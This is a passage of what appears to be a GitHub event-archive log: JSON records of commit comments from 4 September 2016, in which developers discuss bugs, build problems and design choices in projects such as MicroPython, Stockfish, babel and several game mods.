*how*, but I think this commit may be causing it. I'm downgrading our workers to git 1962d68ec (immediately before this change) to see how that goes."}},"created_at":"2016-09-04T16:37:28Z"}
{"id":"4514016092","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":18893545,"position":101,"line":461,"path":"EMF/events/emf_coronation.txt","commit_id":"b785de2fc8f21294a100d2dcbea416b7a2e747c6","created_at":"2016-09-04T16:38:09Z","updated_at":"2016-09-04T16:38:09Z","body":"Suggestion: Make the actual `repeat_event` part of the `after` block of the return event for `emf_coronation.1207` (whichever one it is that the guy getting crowned actually gets to interactively say yes/no to the bishop) instead of the `immediate`.  This way, in multiplayer, they won't stack up every single game day (a new one appearing before the previous could even be identified) until you finally just click one in frustration."}},"created_at":"2016-09-04T16:38:09Z"}
{"id":"4514016607","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18893548,"position":null,"line":null,"path":null,"commit_id":"46adb22e814071c3e908ff047b3fb7d99af68b9a","created_at":"2016-09-04T16:38:34Z","updated_at":"2016-09-04T16:38:34Z","body":"I want to figure out how to do an SQL query to search by cast. After that, I have a reason to cut the cast completely from normal contracts. We request the cast separately via a context menu, and populate a new list that is the cast we can search by."}},"created_at":"2016-09-04T16:38:34Z"}
{"id":"4514017438","type":"CommitCommentEvent","actor":{"login":"zaclimon"},"repo":{"name":"aosp-msm8960/android_device_asus_flo"},"payload":{"comment":{"id":18893551,"position":null,"line":null,"path":null,"commit_id":"d7e922f1c4806074e2acf06e971707c6e7cf73f4","created_at":"2016-09-04T16:39:12Z","updated_at":"2016-09-04T16:39:12Z","body":"For real**"}},"created_at":"2016-09-04T16:39:12Z"}
{"id":"4514017800","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"martinmdq14/empleartec-java"},"payload":{"comment":{"id":18893554,"position":null,"line":null,"path":null,"commit_id":"b09749e7f397cdfa850d3997ac1318a783ce8ae1","created_at":"2016-09-04T16:39:27Z","updated_at":"2016-09-04T16:39:27Z","body":"Muy buen Tincho!!"}},"created_at":"2016-09-04T16:39:27Z"}
{"id":"4514018913","type":"CommitCommentEvent","actor":{"login":"ashleyle1402"},"repo":{"name":"GWStudentAssociation/SA-Website"},"payload":{"comment":{"id":18893560,"position":null,"line":null,"path":null,"commit_id":"0c05c18bc87aa84b567405e6053a2640bb983da7","created_at":"2016-09-04T16:40:18Z","updated_at":"2016-09-04T16:40:18Z","body":"Added link to reserve room in District House"}},"created_at":"2016-09-04T16:40:18Z"}
{"id":"4514019726","type":"CommitCommentEvent","actor":{"login":"cavebeat"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":18893561,"position":null,"line":null,"path":null,"commit_id":"9f4be52b74a090afe8f8620ae1f4e92e5d032d7e","created_at":"2016-09-04T16:40:53Z","updated_at":"2016-09-04T16:40:53Z","body":"I cannot find the file in my File System. \r\nand i guess the commit broke my pull https://github.com/linuxmint/Cinnamon/pull/4801 \r\n\r\nWhere can i find the demands-attention-ignored-wm-classes file in my OS ? to test the change and create a new pull request? (Linux Mint Debian, 64bit, Cinnamon v3.0.6)"}},"created_at":"2016-09-04T16:40:53Z"}
{"id":"4514020704","type":"CommitCommentEvent","actor":{"login":"Vdauphin"},"repo":{"name":"Vdauphin/HeartsAndMinds"},"payload":{"comment":{"id":18893564,"position":null,"line":null,"path":null,"commit_id":"99f4f928336198729d207c3414545404508152e7","created_at":"2016-09-04T16:41:38Z","updated_at":"2016-09-04T16:41:38Z","body":"currently this branch is in developpement so yes most of actual parameter are set for debug :)"}},"created_at":"2016-09-04T16:41:38Z"}
{"id":"4514021723","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18893565,"position":null,"line":null,"path":null,"commit_id":"15b41a573006c9635ca26a94d9bd062c1643ea49","created_at":"2016-09-04T16:42:22Z","updated_at":"2016-09-04T16:42:22Z","body":"@Rocky640: Thanks. I will try this in my second take. Locally I'm currently tuning for better values."}},"created_at":"2016-09-04T16:42:22Z"}
{"id":"4514022664","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18893567,"position":null,"line":null,"path":null,"commit_id":"c74da7ef9ef018059a64edc43bd81dfa9c95dbd9","created_at":"2016-09-04T16:43:02Z","updated_at":"2016-09-04T16:43:02Z","body":"Commit message scared me a bit :yum: "}},"created_at":"2016-09-04T16:43:02Z"}
{"id":"4514023126","type":"CommitCommentEvent","actor":{"login":"MarcSabatella"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":18893569,"position":5,"line":50,"path":"mtest/testoves/bdat/harmony 2.ove-ref.mscx","commit_id":"9f57c06f51fd27e16a1213bfd5cbfff0d980ef0f","created_at":"2016-09-04T16:43:24Z","updated_at":"2016-09-04T16:43:24Z","body":"That's certainly plausible.  Does Travis normally run in an environment with everything fully installed?  I would have thought so.  BTW, I have always found it really odd we write these empty System tags that provide no real content.  I guess they do help us catch certain issues in testing every once in a while."}},"created_at":"2016-09-04T16:43:24Z"}
{"id":"4514025052","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18893572,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-04T16:44:49Z","updated_at":"2016-09-04T16:44:49Z","body":"It's improving with population =256, but it still gets stuck after progressing a few generations. "}},"created_at":"2016-09-04T16:44:49Z"}
{"id":"4514025982","type":"CommitCommentEvent","actor":{"login":"XFuryMCPE"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18893573,"position":null,"line":null,"path":null,"commit_id":"aec7a3ed85a04f30b9d72b70142777864949ca9e","created_at":"2016-09-04T16:45:34Z","updated_at":"2016-09-04T16:45:34Z","body":"Noooooo, just add an option to enable or disable it, Genisys-devtools would be a waste of space because the only thing i'd use it for would be this."}},"created_at":"2016-09-04T16:45:34Z"}
{"id":"4514029217","type":"CommitCommentEvent","actor":{"login":"phil235"},"repo":{"name":"tgstation/tgstation"},"payload":{"comment":{"id":18893576,"position":19,"line":709,"path":"code/modules/mob/living/living.dm","commit_id":"7a47b43c53f1f18142613ce1f96cd4930a27805e","created_at":"2016-09-04T16:47:58Z","updated_at":"2016-09-04T16:47:58Z","body":"now if you get flashed again while still flashed, the flash overlay will disappear as soon as the first flash's effect wears off...."}},"created_at":"2016-09-04T16:47:58Z"}
{"id":"4514029735","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18893577,"position":null,"line":null,"path":null,"commit_id":"f819dbefd2536320181caa71e763481a96a91c63","created_at":"2016-09-04T16:48:21Z","updated_at":"2016-09-04T16:48:21Z","body":"There is nothing wrong adding few entries in `terrestrial_nims_regions` list when tuner can be compatible of DVB-T. OpenATV also uses the same aproach with `canBeCompatible`."}},"created_at":"2016-09-04T16:48:21Z"}
{"id":"4514029998","type":"CommitCommentEvent","actor":{"login":"nsmith5"},"repo":{"name":"nsmith5/Maxima.jl"},"payload":{"comment":{"id":18893578,"position":null,"line":null,"path":null,"commit_id":"535f48cccdfdff6774d60e2b659d847ce7aaa70d","created_at":"2016-09-04T16:48:33Z","updated_at":"2016-09-04T16:48:33Z","body":"Fixes #4 "}},"created_at":"2016-09-04T16:48:33Z"}
{"id":"4514030375","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18893581,"position":null,"line":null,"path":null,"commit_id":"cc1fe049cdfb235e03f80d794399ecef9879bb92","created_at":"2016-09-04T16:48:50Z","updated_at":"2016-09-04T16:48:50Z","body":"This revealed a potential opportunity for Clang - we should try to get `X86_SHA256_HashBlocks` and `SHA512_SSE2_Transform` working. It should speedup SHA-256 through SHA-512.\r\n\r\nI recall Clang produced incorrect results, but I did not investigate it too deeply."}},"created_at":"2016-09-04T16:48:50Z"}
{"id":"4514030672","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18893582,"position":null,"line":null,"path":null,"commit_id":"aec7a3ed85a04f30b9d72b70142777864949ca9e","created_at":"2016-09-04T16:49:06Z","updated_at":"2016-09-04T16:49:06Z","body":"@XFuryMCPE https://github.com/iTXTech/DevTools/releases :P if you only want FolderPluginLoader,  just use the FPL phar."}},"created_at":"2016-09-04T16:49:06Z"}
{"id":"4514034545","type":"CommitCommentEvent","actor":{"login":"XFuryMCPE"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18893587,"position":null,"line":null,"path":null,"commit_id":"aec7a3ed85a04f30b9d72b70142777864949ca9e","created_at":"2016-09-04T16:51:55Z","updated_at":"2016-09-04T16:51:55Z","body":"ok"}},"created_at":"2016-09-04T16:51:55Z"}
{"id":"4514037103","type":"CommitCommentEvent","actor":{"login":"5HT"},"repo":{"name":"synrc/adm"},"payload":{"comment":{"id":18893588,"position":null,"line":null,"path":null,"commit_id":"2ad74fb878007585af021ecba4499bafd4ed25a8","created_at":"2016-09-04T16:53:38Z","updated_at":"2016-09-04T16:53:38Z","body":"👍 "}},"created_at":"2016-09-04T16:53:38Z"}
{"id":"4514038132","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893589,"position":null,"line":null,"path":null,"commit_id":"5d46ddf3f1cbc766ff5bb85221f187712f800e40","created_at":"2016-09-04T16:54:16Z","updated_at":"2016-09-04T16:54:16Z","body":"I had staged an equivalent commit in parallel: 0d0465fe94 :-)"}},"created_at":"2016-09-04T16:54:16Z"}
{"id":"4514038565","type":"CommitCommentEvent","actor":{"login":"ashleyle1402"},"repo":{"name":"GWStudentAssociation/SA-Website"},"payload":{"comment":{"id":18893590,"position":null,"line":null,"path":null,"commit_id":"3e962401eeeae59b98e6e4e53d33fe9ae61181a0","created_at":"2016-09-04T16:54:33Z","updated_at":"2016-09-04T16:54:33Z","body":"Added judges' info"}},"created_at":"2016-09-04T16:54:33Z"}
{"id":"4514042224","type":"CommitCommentEvent","actor":{"login":"DaMadBoy"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18893593,"position":null,"line":null,"path":null,"commit_id":"6655a2cde35de8e36fb087617b0a4e45930c44d3","created_at":"2016-09-04T16:56:47Z","updated_at":"2016-09-04T16:56:47Z","body":"#include \"ObjectMgr.h\" is required to build on linux in BattleGroundDS.cpp"}},"created_at":"2016-09-04T16:56:47Z"}
{"id":"4514044291","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18893596,"position":null,"line":null,"path":null,"commit_id":"f3ae0c297f0a945b036d2c838201679d009d206b","created_at":"2016-09-04T16:58:02Z","updated_at":"2016-09-04T16:58:02Z","body":"https://guarded-sands-16225.herokuapp.com/tasks/"}},"created_at":"2016-09-04T16:58:02Z"}
{"id":"4514048796","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893601,"position":null,"line":null,"path":null,"commit_id":"7ddd1a58f6ec90a35e2ca815f62358acfb801c52","created_at":"2016-09-04T17:00:35Z","updated_at":"2016-09-04T17:00:35Z","body":"@deshipu , @dpgeorge : FYI, per out previous discussion.\r\n\r\nI also found following:\r\n\r\n~~~\r\n>>> machine.SPI()\r\nTraceback (most recent call last):\r\n  File \"<stdin>\", line 1, in <module>\r\nTypeError: function missing 1 required positional arguments\r\n~~~\r\n\r\nI believe that's no how we discussed it - if explicit ID isn't given, it should default to -1 (SoftSPI). I'm looking into that.\r\n"}},"created_at":"2016-09-04T17:00:35Z"}
{"id":"4514049331","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"zyedidia/micro"},"payload":{"comment":{"id":18893602,"position":null,"line":null,"path":null,"commit_id":"a8feef3c12fa151f994686738537cca6bf4a0f8a","created_at":"2016-09-04T17:00:53Z","updated_at":"2016-09-04T17:00:53Z","body":":+1: "}},"created_at":"2016-09-04T17:00:53Z"}
{"id":"4514050298","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18893605,"position":60,"line":1499,"path":"FHEM/00_SIGNALduino.pm","commit_id":"f06c82a55c9e8b020f8065a830e08d55d03e5fa7","created_at":"2016-09-04T17:01:24Z","updated_at":"2016-09-04T17:01:24Z","body":"habe es getestet"}},"created_at":"2016-09-04T17:01:24Z"}
{"id":"4514053253","type":"CommitCommentEvent","actor":{"login":"rhiever"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18893610,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-04T17:03:05Z","updated_at":"2016-09-04T17:03:05Z","body":"Sometimes it takes a while to discover an even better pipeline. That's why\nI recommend giving it something like 24h if you have the time.\n\nOn Sunday, September 4, 2016, Juan Julián Merelo Guervós <\nnotifications@github.com> wrote:\n\n> It's improving with population =256, but it still gets stuck after\n> progressing a few generations.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/geneura-papers/nowcasting-traffic/commit/b47073905bad309ea37d269e8e0be44569be3907#commitcomment-18893572>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABo7t5RizwYhyf-NLZutmdeY1YsLB2J_ks5qmvWCgaJpZM4J0QZy>\n> .\n>\n\n\n-- \nCheers,\n\nRandal S. Olson, Ph.D.\nSenior Data Scientist, Institute for Biomedical Informatics\nUniversity of Pennsylvania\n\nE-mail: rso@randalolson.com | Twitter: @randal_olson\n<https://twitter.com/randal_olson>\nhttp://www.randalolson.com\n"}},"created_at":"2016-09-04T17:03:05Z"}
{"id":"4514053387","type":"CommitCommentEvent","actor":{"login":"cdanger"},"repo":{"name":"authzforce/fiware"},"payload":{"comment":{"id":18893612,"position":null,"line":null,"path":null,"commit_id":"8b64dbe04649afe3daa772c883eb0bd637a410cf","created_at":"2016-09-04T17:03:09Z","updated_at":"2016-09-04T17:03:09Z","body":"__API Description file syntax error on line 256__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-04T17:03:09Z"}
{"id":"4514055285","type":"CommitCommentEvent","actor":{"login":"ashleyle1402"},"repo":{"name":"GWStudentAssociation/SA-Website"},"payload":{"comment":{"id":18893614,"position":null,"line":null,"path":null,"commit_id":"e5497e2380a189ac8bd6c5ddbba1bc96eeb16256","created_at":"2016-09-04T17:04:17Z","updated_at":"2016-09-04T17:04:17Z","body":"Corrected Ciaran's information"}},"created_at":"2016-09-04T17:04:17Z"}
{"id":"4514056424","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18893615,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-04T17:05:02Z","updated_at":"2016-09-04T17:05:02Z","body":"Does this put a \"Cloud\" icon in the header when online? Because that's what it's doing."}},"created_at":"2016-09-04T17:05:02Z"}
{"id":"4514057327","type":"CommitCommentEvent","actor":{"login":"elptito"},"repo":{"name":"daid/SeriousProton"},"payload":{"comment":{"id":18893616,"position":null,"line":null,"path":null,"commit_id":"dc232f90c755fe001310409d4a7556e0f1d2f3b8","created_at":"2016-09-04T17:05:33Z","updated_at":"2016-09-04T17:05:33Z","body":"I think this cause an error during this compilation. See https://github.com/daid/EmptyEpsilon/issues/394"}},"created_at":"2016-09-04T17:05:33Z"}
{"id":"4514059681","type":"CommitCommentEvent","actor":{"login":"vvs-"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":18893620,"position":370,"line":304,"path":"src/world.cpp","commit_id":"9875e1f931d205d7ce0322c87fbcbbf6258e6193","created_at":"2016-09-04T17:07:07Z","updated_at":"2016-09-04T17:07:07Z","body":"This is usage before initialization. I get a rare crashes because of this. Sometimes the memory it points to contains something not null."}},"created_at":"2016-09-04T17:07:07Z"}
{"id":"4514060331","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"calamares/calamares-manjaro"},"payload":{"comment":{"id":18893621,"position":null,"line":null,"path":null,"commit_id":"ea396b68a6740c8608a62bea7d3668ed76f4ddce","created_at":"2016-09-04T17:07:31Z","updated_at":"2016-09-04T17:07:31Z","body":"Seems not to be needed. **spinner** is also a common default theme ..."}},"created_at":"2016-09-04T17:07:31Z"}
{"id":"4514060853","type":"CommitCommentEvent","actor":{"login":"loveGhb"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18893622,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T17:07:49Z","updated_at":"2016-09-04T17:07:49Z","body":"It is very sad"}},"created_at":"2016-09-04T17:07:49Z"}
{"id":"4514061768","type":"CommitCommentEvent","actor":{"login":"Alex-Railean"},"repo":{"name":"Alex-Railean/testRepos"},"payload":{"comment":{"id":18893624,"position":null,"line":null,"path":null,"commit_id":"f2d9ef36aaa0fdc849296cc6a34624a3fb428b3a","created_at":"2016-09-04T17:08:21Z","updated_at":"2016-09-04T17:08:21Z","body":"Leave a comment"}},"created_at":"2016-09-04T17:08:21Z"}
{"id":"4514064353","type":"CommitCommentEvent","actor":{"login":"karlhorky"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":18893628,"position":null,"line":null,"path":null,"commit_id":"fe6cda0b891efd6c7ed0cf7c7d7230dee6a25591","created_at":"2016-09-04T17:10:11Z","updated_at":"2016-09-04T17:10:11Z","body":"I've opened #293 for the new fonts to be reconsidered."}},"created_at":"2016-09-04T17:10:11Z"}
{"id":"4514067933","type":"CommitCommentEvent","actor":{"login":"amanelis"},"repo":{"name":"cybricio/python-cybric-bundle"},"payload":{"comment":{"id":18893632,"position":5,"line":6,"path":"cybric/events/reader.py","commit_id":"0c3a57549cf4364bd15f4792ff0f2519fe375f12","created_at":"2016-09-04T17:12:42Z","updated_at":"2016-09-04T17:12:42Z","body":"I think I'd say pass in a generic `options={}` dict here, and then set based on what is present:\r\n\r\n```python\r\nif 'kafka_hosts' in options:\r\n    self.kafka_hosts = options['kafka_hosts']\r\n```\r\n\r\nThis Config I don't think should be necessarily bound by method arguments. I understand it's a kafka_reader, but maybe I'm wrong. I would have done and options dict. "}},"created_at":"2016-09-04T17:12:42Z"}
{"id":"4514068503","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"GiantCupcake/Hes_-t-"},"payload":{"comment":{"id":18893633,"position":5,"line":5,"path":"PCoursJava/package_spec.txt","commit_id":"1dcac6309e9c9fede30ebeae8d6c37a5cfedbc28","created_at":"2016-09-04T17:13:08Z","updated_at":"2016-09-04T17:13:08Z","body":"Faites au moins l'effort de l'orthographier juste.\r\n\r\n![](https://c2.staticflickr.com/2/1190/547886492_0ec42423dd.jpg)"}},"created_at":"2016-09-04T17:13:08Z"}
{"id":"4514068698","type":"CommitCommentEvent","actor":{"login":"amanelis"},"repo":{"name":"cybricio/python-cybric-bundle"},"payload":{"comment":{"id":18893635,"position":5,"line":6,"path":"cybric/events/reader.py","commit_id":"0c3a57549cf4364bd15f4792ff0f2519fe375f12","created_at":"2016-09-04T17:13:16Z","updated_at":"2016-09-04T17:13:16Z","body":"doesn't the Config() object contain kafka_hosts?"}},"created_at":"2016-09-04T17:13:16Z"}
{"id":"4514069231","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18893637,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-04T17:13:39Z","updated_at":"2016-09-04T17:13:39Z","body":"Yes, it lets the user know they can tap to go into offline settings\n"}},"created_at":"2016-09-04T17:13:39Z"}
{"id":"4514069344","type":"CommitCommentEvent","actor":{"login":"iLaloxYT"},"repo":{"name":"games647/FastLogin"},"payload":{"comment":{"id":18893639,"position":null,"line":null,"path":null,"commit_id":"b660951e1e9215a901e06568c9fa0f4e0fc65a6d","created_at":"2016-09-04T17:13:44Z","updated_at":"2016-09-04T17:13:44Z","body":"how can I download the .jar with this changes xD"}},"created_at":"2016-09-04T17:13:44Z"}
{"id":"4514071628","type":"CommitCommentEvent","actor":{"login":"grogsaxle"},"repo":{"name":"cybricio/python-cybric-bundle"},"payload":{"comment":{"id":18893644,"position":5,"line":6,"path":"cybric/events/reader.py","commit_id":"0c3a57549cf4364bd15f4792ff0f2519fe375f12","created_at":"2016-09-04T17:15:24Z","updated_at":"2016-09-04T17:15:24Z","body":"I like the idea of passing an option dict in.  that should clean it up some.\r\n"}},"created_at":"2016-09-04T17:15:24Z"}
{"id":"4514072138","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"TeslaRom-N/manifest"},"payload":{"comment":{"id":18893646,"position":null,"line":null,"path":null,"commit_id":"dd34e2913a3af1a7cbc601692cb05ee78a6131ee","created_at":"2016-09-04T17:15:46Z","updated_at":"2016-09-04T17:15:46Z","body":"but but but"}},"created_at":"2016-09-04T17:15:46Z"}
{"id":"4514072629","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18893648,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-04T17:16:12Z","updated_at":"2016-09-04T17:16:12Z","body":"Is that necessary though? It just clutters up the header. "}},"created_at":"2016-09-04T17:16:12Z"}
{"id":"4514074569","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18893649,"position":null,"line":null,"path":null,"commit_id":"6bbc398474614c606559ce493470e2ad90cea8c8","created_at":"2016-09-04T17:17:42Z","updated_at":"2016-09-04T17:17:42Z","body":"Think this should be done for the toolbar sub search as well?"}},"created_at":"2016-09-04T17:17:42Z"}
{"id":"4514074721","type":"CommitCommentEvent","actor":{"login":"vinkla"},"repo":{"name":"rcrowe/TwigBridge"},"payload":{"comment":{"id":18893651,"position":null,"line":null,"path":null,"commit_id":"6226d33331bbb1cdf64593a786f7efd1670200a7","created_at":"2016-09-04T17:17:48Z","updated_at":"2016-09-04T17:17:48Z","body":"https://vinkla.com/2016/laravel-semver/"}},"created_at":"2016-09-04T17:17:48Z"}
{"id":"4514075271","type":"CommitCommentEvent","actor":{"login":"apearce"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":18893652,"position":null,"line":null,"path":null,"commit_id":"b3dca4fb5a5b775b3a893bc098dfb79a5616d720","created_at":"2016-09-04T17:18:12Z","updated_at":"2016-09-04T17:18:12Z","body":"This commit did not get published to npm (it still shows 6.14.0 being the latest) and a lot of other packages are depending on this version which is breaking the react native app I am working on."}},"created_at":"2016-09-04T17:18:12Z"}
{"id":"4514075704","type":"CommitCommentEvent","actor":{"login":"KushalBKusram"},"repo":{"name":"Graphify/graphify"},"payload":{"comment":{"id":18893654,"position":null,"line":null,"path":null,"commit_id":"3a8bde5dc80968bb20d68abcacf99ee962e90003","created_at":"2016-09-04T17:18:32Z","updated_at":"2016-09-04T17:18:32Z","body":"Hey, I'm trying to use this with Neo4j 3.0.1, I'm unable to get this working. Are their any issues with newer versions?"}},"created_at":"2016-09-04T17:18:32Z"}
{"id":"4514076380","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893656,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T17:19:05Z","updated_at":"2016-09-04T17:19:05Z","body":"There is a small defect in the algorithm. \r\nThere is no guarantee that pawns are ordered\r\nSo if the pawn list starts with a2 then c2 then b3, it will return 2 pawn groups. \r\nI will try to efficiently improve this.\r\n"}},"created_at":"2016-09-04T17:19:05Z"}
{"id":"4514078003","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/rmw"},"payload":{"comment":{"id":18893658,"position":null,"line":null,"path":null,"commit_id":"6859ab16ebf73421b039053c8fe3296726ecf85d","created_at":"2016-09-04T17:20:14Z","updated_at":"2016-09-04T17:20:14Z","body":"This should have referenced #24 not 22"}},"created_at":"2016-09-04T17:20:14Z"}
{"id":"4514080077","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18893659,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-04T17:21:46Z","updated_at":"2016-09-04T17:21:46Z","body":"But the problem is that, in that case, the evolutionary algorithm is exploring more than exploiting resutls. That is why fitness is stuck until a new random mutation finds something a bit better. Wondering how this could be improved, maybe a memetic algorithm. Just by changing default initial population exploration might improve, for instance, but other things could be done too, I guess. It's a big search space so it's a difficult problem, but at the end of the day there are many tricks and things that could be applied to improve, I think."}},"created_at":"2016-09-04T17:21:46Z"}
{"id":"4514080766","type":"CommitCommentEvent","actor":{"login":"fergunet"},"repo":{"name":"geneura-papers/2016-HPCA-HPMOON"},"payload":{"comment":{"id":18893660,"position":null,"line":null,"path":null,"commit_id":"073aa3bb2449c58446c37b1c7447b9dd797db3a7","created_at":"2016-09-04T17:22:16Z","updated_at":"2016-09-04T17:22:16Z","body":"Thanks for the comments @JJ BTW, if you add any new sentence use \\textcolor{red}{ } (as requested by the editor). Also, one issue is to improve the discussions, if you know how to add the good stuff feel free (although we still need to wait for the real problem results)."}},"created_at":"2016-09-04T17:22:16Z"}
{"id":"4514081198","type":"CommitCommentEvent","actor":{"login":"JKornev"},"repo":{"name":"JKornev/hidden"},"payload":{"comment":{"id":18893661,"position":18,"line":61,"path":"Hidden/Device.c","commit_id":"80b89c2f28846810ecbf1e68e37de19d062ed747","created_at":"2016-09-04T17:22:36Z","updated_at":"2016-09-04T17:22:36Z","body":"Just for common style"}},"created_at":"2016-09-04T17:22:36Z"}
{"id":"4514081432","type":"CommitCommentEvent","actor":{"login":"bgbennyboy"},"repo":{"name":"arasu33/USB-Disk-Ejector"},"payload":{"comment":{"id":18893662,"position":null,"line":null,"path":null,"commit_id":"83a7e863afda3141df2d464cc1bcdda94fe56898","created_at":"2016-09-04T17:22:44Z","updated_at":"2016-09-04T17:22:44Z","body":"You forked it to remove my copyright notices and credits from the about form???"}},"created_at":"2016-09-04T17:22:44Z"}
{"id":"4514081689","type":"CommitCommentEvent","actor":{"login":"Swailem95"},"repo":{"name":"Mshokrr/Arabesque"},"payload":{"comment":{"id":18893663,"position":null,"line":null,"path":null,"commit_id":"9d7f20481f6f9232644cc3f0430b222b0de49212","created_at":"2016-09-04T17:22:55Z","updated_at":"2016-09-04T17:22:55Z","body":"That's it?\r\n"}},"created_at":"2016-09-04T17:22:55Z"}
{"id":"4514082235","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"geneura-papers/2016-HPCA-HPMOON"},"payload":{"comment":{"id":18893664,"position":null,"line":null,"path":null,"commit_id":"073aa3bb2449c58446c37b1c7447b9dd797db3a7","created_at":"2016-09-04T17:23:21Z","updated_at":"2016-09-04T17:23:21Z","body":"they are mainly corrections, I don't think it's worth the while. Only\nthings done as a response to the editor are better hightlighted.\n"}},"created_at":"2016-09-04T17:23:21Z"}
{"id":"4514084703","type":"CommitCommentEvent","actor":{"login":"vjpai"},"repo":{"name":"grpc/grpc"},"payload":{"comment":{"id":18893668,"position":null,"line":null,"path":null,"commit_id":"7dc6bf43d5cd52d123e481ea2be6af643c17a668","created_at":"2016-09-04T17:25:21Z","updated_at":"2016-09-04T17:25:21Z","body":"What is the intended effect here? I believe this has no effect, as this is the destructor. If there's any use after this point it indicates a bigger problem."}},"created_at":"2016-09-04T17:25:21Z"}
{"id":"4514085703","type":"CommitCommentEvent","actor":{"login":"jcadduono"},"repo":{"name":"offensive-security/kali-nethunter"},"payload":{"comment":{"id":18893670,"position":null,"line":null,"path":null,"commit_id":"10bcde7d47a4bad1a75986083b76e6d4ced00b3c","created_at":"2016-09-04T17:26:11Z","updated_at":"2016-09-04T17:26:11Z","body":"it's already in there, i moved the location"}},"created_at":"2016-09-04T17:26:11Z"}
{"id":"4514087920","type":"CommitCommentEvent","actor":{"login":"File14"},"repo":{"name":"PrismarineMC/MagmaBlock"},"payload":{"comment":{"id":18893673,"position":null,"line":null,"path":null,"commit_id":"5aa00deb1c91999e84aed2425e83404a12c4fb42","created_at":"2016-09-04T17:28:02Z","updated_at":"2016-09-04T17:28:02Z","body":"Omg...\r\nYou can't add it in the synapsePlayer class!\r\n\r\nAdd it in SynapseAPI.... \r\n\r\n\r\n@MrGenga "}},"created_at":"2016-09-04T17:28:02Z"}
{"id":"4514088806","type":"CommitCommentEvent","actor":{"login":"SpadesNeil"},"repo":{"name":"PolarisSS13/Polaris"},"payload":{"comment":{"id":18893674,"position":4,"line":14,"path":"code/game/objects/random/random.dm","commit_id":"f75d509e7fe8e364d5db5782a3dd1ced183a1dfd","created_at":"2016-09-04T17:28:40Z","updated_at":"2016-09-04T17:28:40Z","body":"Well, that can't be right, because https://github.com/PolarisSS13/Polaris/issues/1892 started to occur after this change was made, and I just resolved it by undoing it in https://github.com/PolarisSS13/Polaris/pull/2427 and have tested it. There must be a deeper problem here."}},"created_at":"2016-09-04T17:28:40Z"}
